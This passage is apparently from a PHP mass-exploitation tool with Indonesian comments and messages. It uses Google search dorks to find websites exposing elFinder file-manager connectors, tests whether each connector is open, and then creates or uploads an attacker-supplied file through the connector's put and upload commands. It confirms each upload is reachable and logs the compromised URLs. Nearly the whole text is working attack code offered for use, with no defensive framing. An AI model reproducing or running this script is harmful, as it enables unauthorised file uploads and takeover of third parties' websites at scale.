"put", "target" => "l1_$encode", "content" => "$decode_isi", ); $post2 = array( "current" => "8ea8853cb93f2f9781e0bf6e857015ea", "upload[]" => "@$nama_doang", ); $output_mkfile = ngirim("$target", $post1); if(preg_match("/$nama_doang/", $output_mkfile)){ $b = cek_pepes($ini_site, $nama_doang); return $b; } else{ $upload_ah = ngirim("$target?cmd=upload", $post2); if(preg_match("/$nama_doang/", $upload_ah)){ $b = cek_pepes($ini_site, $nama_doang); return $b; } else{ $b = "# Upload Failed 2\n"; return $b; } } } function cek_pepes($target, $nama_doang){ $aso = "$target/files/$nama_doang"; echo "# $aso\n"; $cekk = file_get_contents("$aso"); if(preg_match("/file/", $cekk)){ $a = "# Uploaded \n# $aso"; save("$aso
"); return $a; } else{ $a = "# Gagal Upload"; return $a; } } for($i=0;$i+=8;$i++){ echo $i."\n"; $result = file_get_contents("http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz=8&q=$dork&key=$kunAPI&start=$i"); $data = json_decode($result, true); if($data['responseStatus']=="200"){ foreach ($data['responseData']['results'] as $key) { $siten = $key['url']; $explode = explode("files", $siten); $ini_site = $explode[0]; $ini = array("connectors/php/connector.php", "php/connector.php"); foreach($ini as $path){ $target = "$ini_site$path"; echo "# $target\n"; $cek = file_get_contents("$target"); $data = json_decode($cek, true); $error_ngk = $data['error']['0']; $error_cwd = $data['cwd']['name']; if($error_ngk == ""){ if($error_cwd == "Home"){ $b = elfinder($target, $nama_doang, $url_mkfile, $encode, $decode_isi, $nama_doang, $ini_site); echo "$b\n\n"; } else{ echo "- Not Vuln!\n\n"; } } else{ $b = elfinder($target, $nama_doang, $url_mkfile, $encode, $decode_isi, $nama_doang, $ini_site); echo "$b\n\n"; } } $total_target++; flush(); sleep(1); } } else if($data['responseStatus']=="403"){ echo "Suspected Terms of Service Abuse!!! {oww jancokk -_-}\n"; }else if($data['responseStatus']=="400"){ echo "Tidak ada hasil - Scan Done !!!\n"; break; } $no++; } ?>